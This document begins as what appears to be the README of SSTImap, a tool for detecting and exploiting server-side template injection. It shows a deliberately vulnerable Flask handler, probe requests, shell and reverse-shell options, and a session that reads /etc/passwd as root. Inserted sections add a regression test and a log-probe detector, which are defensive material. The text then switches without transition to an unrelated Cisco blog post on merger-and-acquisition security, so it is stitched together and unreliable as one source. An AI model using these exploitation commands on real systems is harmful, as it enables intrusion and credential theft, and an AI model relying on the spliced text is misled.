SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.
This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.
Sandbox break-out techniques came from:
This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.
Even though this software is based on Tplmap's code, backwards compatibility is not provided.
Notable differences include:

- Interactive mode (-i) allowing for easier exploitation and detection
- Base language eval()-like shell (-x) or single command (-X) execution
- New payload for Smarty without enabled {php}{/php}. Old payload is available as Smarty_unsecure.
- User-Agent can be randomly selected from a list of desktop browser agents using -A
- SSL verification can be enabled using -V
- Some command line arguments were changed; check -h for help

This is an example of a simple website written in Python using the Flask framework and the Jinja2 template engine. It integrates the user-supplied variable name in an unsafe way, as it is concatenated to the template string before rendering.
```python
from flask import Flask, request, render_template_string
import os

app = Flask(__name__)


@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    # SSTI VULNERABILITY: user input is pasted into the template source
    template = f"Hello, {name}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, os=os.name)


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)
```
Not only does this way of using templates create an XSS vulnerability, it also allows the attacker to inject template code that will be executed on the server, leading to SSTI.
```
$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix
```
User-supplied input should be introduced in a safe way through rendering context:
```python
from flask import Flask, request, render_template_string
import os

app = Flask(__name__)


@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    # Safe: user input reaches the engine only as a context value
    template = "Hello, {{name}}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, name=name, os=os.name)


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)
```
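The difference between the two handlers can be pinned down in a unit test, so that a later refactor that reintroduces string concatenation fails in CI rather than in production. The following is an added example and not code from the SSTImap README: it drives Jinja2 directly (the engine behind Flask's `render_template_string`, with autoescaping on as Flask sets it), models each handler with a small function of my own, and applies the same rendering probe SSTImap reports for Jinja2 in the scan output, a `{{*}}` tag with a random product substituted for the star. It requires the `jinja2` package; the `os` value, the handler stand-ins and the helper names are constructed for this example.

```python
"""Added example (not from the SSTImap README): a regression check showing
why concatenating user input into template source is an SSTI while passing
it through the rendering context is not. Requires the jinja2 package; the
handler stand-ins, the probe helper and the os value are constructed here."""
import random

from jinja2 import Environment

# Flask's render_template_string renders with autoescaping enabled; match it.
env = Environment(autoescape=True)


def render_unsafe(name: str) -> str:
    """Stand-in for the vulnerable handler: `name` becomes template source."""
    template = f"Hello, {name}!<br>\n" "OS type: {{os}}"
    return env.from_string(template).render(os="posix")  # constructed value


def render_safe(name: str) -> str:
    """Stand-in for the fixed handler: `name` is only ever a context value."""
    template = "Hello, {{name}}!<br>\n" "OS type: {{os}}"
    return env.from_string(template).render(name=name, os="posix")


def evaluates_user_input(render, tag: str = "{{*}}") -> bool:
    """Rendering probe in the style of the '{{*}}' tag SSTImap reports for
    Jinja2: replace '*' with a random product and report the input as
    evaluated only if the result appears and the literal expression does
    not. Random operands keep a cached or hard-coded '49' from fooling
    the check."""
    a, b = random.randint(100, 999), random.randint(100, 999)
    expr = f"{a}*{b}"
    out = render(tag.replace("*", expr))
    return str(a * b) in out and expr not in out


def escapes_markup(render) -> bool:
    """Same idea for the XSS side of the bug: markup in `name` must come
    back escaped, not as live HTML."""
    out = render("<b>x</b>")
    return "<b>" not in out and "&lt;b&gt;" in out


if __name__ == "__main__":
    for label, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        print(f"{label}: evaluates input={evaluates_user_input(fn)} "
              f"escapes markup={escapes_markup(fn)}")
```

Both checks pass for `render_safe` and fail for `render_unsafe`; the probe is engine-specific only in its `tag` argument, so the same function can be reused with the tags of other engines in the table further down.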
SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.
After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.
To check the URL, you can use the -u argument:
```
$ ./sstimap.py -u https://example.com/page?name=John
[SSTImap ASCII art banner]
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:
  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux
  Technique: render
  Capabilities:
    Shell command execution: ok
    Bind and reverse shell: ok
    File write: ok
    File read: ok
    Code evaluation: ok, python code
[+] Rerun SSTImap providing one of the following options:
    --os-shell                   Prompt for an interactive operating system shell
    --os-cmd                     Execute an operating system command.
    --eval-shell                 Prompt for an interactive shell on the template engine base language.
    --eval-cmd                   Evaluate code in the template engine base language.
    --tpl-shell                  Prompt for an interactive shell on the template engine.
    --tpl-cmd                    Inject code in the template engine.
    --bind-shell PORT            Connect to a shell bind to a target port
    --reverse-shell HOST PORT    Send a shell back to the attacker's port
    --upload LOCAL REMOTE        Upload files to the server
    --download REMOTE LOCAL      Download remote files
```
Use the --os-shell option to launch a pseudo-terminal on the target.
```
$ ./sstimap.py -u https://example.com/page?name=John --os-shell
[SSTImap ASCII art banner]
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:
  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux
  Technique: render
  Capabilities:
    Shell command execution: ok
    Bind and reverse shell: ok
    File write: ok
    File read: ok
    Code evaluation: ok, python code
[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
```
To get a full list of options, use the --help argument.
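On the defending side, the probes visible in the scan output above (an arithmetic expression inside the `{{*}}` tag for Jinja2, and the equivalent tags for other engines) leave a recognisable trace in web access logs, which makes an active scan easy to spot before it reaches the exploitation stage. The following is an added example, not part of SSTImap: a standard-library-only Python detector run over constructed log lines in the common Apache/nginx combined format. The regexes, function names and sample lines are my own, and the list of tag syntaxes covers only some of the engines in the table below.

```python
"""Added example (not SSTImap code): flag template-expression probes in
web access logs. Sample lines and helper names are constructed for this
example."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Evaluated-arithmetic probes in the tag syntaxes of several engines SSTImap
# covers: {{7*7}} (Jinja2, Twig, Nunjucks), ${7*7} (Freemarker, Mako),
# <%= 7*7 %> (ERB, EJS), #{7*7} (Slim, Pug) and {7*7} (Smarty). Digits and
# a '*' inside the tag are what separate a probe from ordinary text.
PROBE_RE = re.compile(
    r"\{\{\s*\d+\s*\*\s*\d+\s*\}\}"
    r"|\$\{\s*\d+\s*\*\s*\d+\s*\}"
    r"|<%=\s*\d+\s*\*\s*\d+\s*%>"
    r"|#\{\s*\d+\s*\*\s*\d+\s*\}"
    r"|\{\s*\d+\s*\*\s*\d+\s*\}"
)

# Apache/nginx combined-style line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample: one benign request, three probes (URL-encoded, as a
# scanner or browser would send them) and one line that must not match.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /page?name=John HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /page?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 509 "-" "curl/8.0"',
    '198.51.100.2 - - [10/Oct/2023:13:55:38 +0000] "GET /page?name=%24%7B1234*5678%7D HTTP/1.1" 200 520 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Oct/2023:13:55:39 +0000] "GET /page?name=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 520 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2023:13:55:40 +0000] "GET /page?name=Price*Qty HTTP/1.1" 200 515 "-" "Mozilla/5.0"',
]


def find_ssti_probes(log_lines):
    """Return (client ip, decoded request target, matched probe) per hit.

    The target is percent-decoded first because '{{7*7}}' arrives as
    '%7B%7B7*7%7D%7D'; matching the raw line would miss it."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than crash the detector
        target = unquote_plus(m.group("target"))
        probe = PROBE_RE.search(target)
        if probe:
            hits.append((m.group("ip"), target, probe.group(0)))
    return hits


def probing_clients(log_lines):
    """Probe hits per client, the view an analyst triages from."""
    return Counter(ip for ip, _, _ in find_ssti_probes(log_lines))


if __name__ == "__main__":
    for ip, target, probe in find_ssti_probes(SAMPLE_LOG):
        print(f"{ip} sent probe {probe!r} in {target}")
    print(dict(probing_clients(SAMPLE_LOG)))
```

Decoding before matching is the part most often missed in ad hoc log greps; the last sample line shows why the patterns insist on digits around the `*`, since a plain `*` in a parameter value is common in legitimate traffic.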
In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use the -i argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.

Some commands are used to alter settings between test runs. To run a test, the target URL must be supplied via the initial -u argument or the url command. After that, you can use the run command to check the URL for SSTI.

If SSTI was found, commands can be used to start the exploitation. You get the same exploitation capabilities as in the predetermined mode, but you can use Ctrl+C to abort them without stopping the program.

Test results are valid until the target URL is changed, so you can easily switch between exploitation methods without running the detection test every time.

To get a full list of interactive commands, use the help command in interactive mode.
SSTImap supports multiple template engines and eval()-like injections.
New payloads are welcome in PRs.
| Engine | RCE | Blind | Code evaluation | File read | File write |
|---|---|---|---|---|---|
| Mako | ✓ | ✓ | Python | ✓ | ✓ |
| Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |
| Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |
| Tornado | ✓ | ✓ | Python | ✓ | ✓ |
| Nunjucks | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Pug | ✓ | ✓ | JavaScript | ✓ | ✓ |
| doT | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Marko | ✓ | ✓ | JavaScript | ✓ | ✓ |
| JavaScript (code eval) | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Dust (<= dustjs-helpers@1.5.0) | ✓ | ✓ | JavaScript | ✓ | ✓ |
| EJS | ✓ | ✓ | JavaScript | ✓ | ✓ |
| Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |
| Slim | ✓ | ✓ | Ruby | ✓ | ✓ |
| ERB | ✓ | ✓ | Ruby | ✓ | ✓ |
| Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |
| Smarty (secured) | ✓ | ✓ | PHP | ✓ | ✓ |
| PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |
| Twig (<=1.19) | ✓ | ✓ | PHP | ✓ | ✓ |
| Freemarker | ✓ | ✓ | Java | ✓ | ✓ |
| Velocity | ✓ | ✓ | Java | ✓ | ✓ |
| Twig (>1.19) | ✗ | ✗ | ✗ | ✗ | ✗ |
| Dust (> dustjs-helpers@1.5.0) | ✗ | ✗ | ✗ | ✗ | ✗ |
Currently, the Burp Suite extension only works with Jython as a way to execute Python 2; Python 3 functionality is not provided.
If you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.
Scott Heider is a manager within the Cisco Security Visibility and Incident Command team that reports to the company's Security & Trust Organization. Primarily tasked with helping to keep the integration of an acquired company's solutions as efficient as possible, Heider and his team are typically brought into the process after a public announcement of the acquisition has already been made. This blog is the final in a series focused on M&A cybersecurity, following Dan Burke's post on Making Merger and Acquisition Cybersecurity More Manageable.
Mergers and acquisitions (M&A) are complicated. Many factors are involved in ensuring cybersecurity across the entire ecosystem as an organization integrates a newly acquired company's products, solutions and personnel into its workstreams.
Through decades of acquisitions, Cisco has gained the expertise and experience to make its M&A efforts seamless and successful. This success is due in large part to a variety of internal teams that keep cybersecurity top of mind throughout the implementation and integration process.
"Priority one for the team," says Heider, "is to balance the enablement of business innovation with the protection of Cisco's information and systems. Because Cisco is now the ultimate responsible party of that acquisition, we make sure that the acquisition adheres to a minimum level of security policy standards and guidelines."
The team looks at the acquired company's security posture and then partners with the company to educate and influence them to take necessary actions to achieve Cisco's security baseline.
That process starts with assessing the acquired company's infrastructure to identify and rate attack surfaces and threats. Heider asks questions that help identify issues around what he calls the four pillars of security, monitoring, and incident response:
The infrastructure that Heider's team evaluates isn't just the company's servers and data center infrastructure. It can also include systems in rented data center space or public cloud infrastructure. Those considerations further complicate security and must be assessed for threats and vulnerabilities.
Once Heider's team is activated, they partner with the acquired company and meet with them regularly to suggest areas where that acquisition can improve its security posture and reduce the overall risk to Cisco.
Identifying and addressing risk is critical for both sides of the table, however, not just for Cisco. "A lot of acquisitions don't realize that when Cisco acquires a company, that organization suddenly has a bigger target on its back," says Heider. "Threat actors will often look at who Cisco is acquiring, and they might know that that company's security posture isn't adequate, because a lot of times these acquisitions are just focused on their go-to-market strategy."
Those security vulnerabilities can become easy entry points for threat actors to gain access to Cisco's systems and data. That's why Heider works so closely with acquisitions to gain visibility into the company's environment to reduce those security threats. Some companies are more focused on security than others, and it's up to Heider's team to figure out what each acquisition needs.
"The acquisition might not have an established forensics program, for instance, and that's where Cisco can come in and help out," Heider says. "They might not have tools like Stealthwatch or NetFlow monitoring, or Firepower for IDS/IPS operations."
When Heider's team can bring in their established toolset and experienced personnel, "that's where the relationship between my team and that acquisition grows because they see we can provide things that they just never thought about, or that they don't have at their disposal," he says.
One of the most important factors in a successful acquisition, according to Heider, is to develop a true partnership with the acquired company and work with the new personnel to reduce risk as efficiently as possible, but without major disruption.
Cisco acquires companies to expand its solution offerings to customers, so disrupting an acquisition's infrastructure or workflow would only slow down its integration. "We don't want to disrupt that acquisition's processes. We don't want to disrupt their people. We don't want to disrupt the technology," says Heider. "What we want to do is be a complement to that acquisition. That approach is an evolution, not a revolution."
The focus on evolution can sometimes result in a long process, but along the way, the teams come to trust each other and work together. "They know their environment better than we do. They often know what works, so we try to learn from them. And that's where constant discussion, constant partnership with them helps them know that we are not a threat, we're an ally," says Heider. "My team can't be everywhere. And that's where we need these acquisitions to be the eyes and ears of specific areas of Cisco's infrastructure."
Training is another way Heider and his team help acquisitions get up to speed on Cisco's security standards. "Training is one of the top priorities within our commitments to both Cisco and the industry," Heider says. "That includes training in Cisco technologies, but also making sure that these individuals are able to connect with other security professionals at conferences and other industry events."
When asked what advice he has for enterprises that want to maintain security while acquiring other companies, Heider has a few recommendations.
Having the right security agents and clear visibility into endpoints is critical, as is feeding the logs of those endpoints into a security information and event management (SIEM) system. That way, explains Heider, you have visibility into your endpoints and can run plays against those logs to identify security threats. "We'll reach out to the asset owner and say they might have malware on their system, which is something nobody wants to hear," says Heider. "But that's what the job entails."
Often, end users don't know that they're clicking on something that could have malware on it. Heider says user education is almost as important as visibility into endpoints. "Cisco really believes in training our users to be custodians of security, because they're safeguarding our assets and our customers' data as well."
End users should be educated about practices such as creating strong passwords and not reusing passwords across different applications. Multi-factor authentication is a good practice, and end users should become familiar with the guidelines around it.
Updating software and systems is a never-ending job, but it's crucial for keeping infrastructure operating. Sometimes, updating a system can weaken security and create vulnerabilities. Enterprises must maintain a balance between enabling business innovation and keeping systems and data secure. Patching systems can be challenging, but neglecting the task can also allow threat actors into a vulnerable system.
Heider says public cloud operations can be beneficial because you're transferring ownership liability operations to a third party, like Amazon Web Services or Google Cloud Platform. "The only caveat," he says, "is to make sure you understand that environment before you go and put your customer's data on it. You might make one false click and expose your certificates to the Internet."
Heider says that while a big part of his job is helping acquisitions uplevel their security domain to meet baseline security requirements, there's always the goal to do even better. "We don't want to be just that baseline," he says. His team has learned from acquisitions in the past and taken some of those functionalities and technologies back to the product groups to make improvements across Cisco's solutions portfolio.
"We're customer zero: Cisco is Cisco's premier customer," says Heider, "because we will take a product or technology into our environment, identify any gaps, and then circle back to product engineering to improve upon it for us and our customers."
Related posts in this series:

- Managing Cybersecurity Risk in M&A
- Demonstrating Trust and Transparency in Mergers and Acquisitions
- When It Comes to M&A, Security Is a Journey
- Making Merger and Acquisition Cybersecurity More Manageable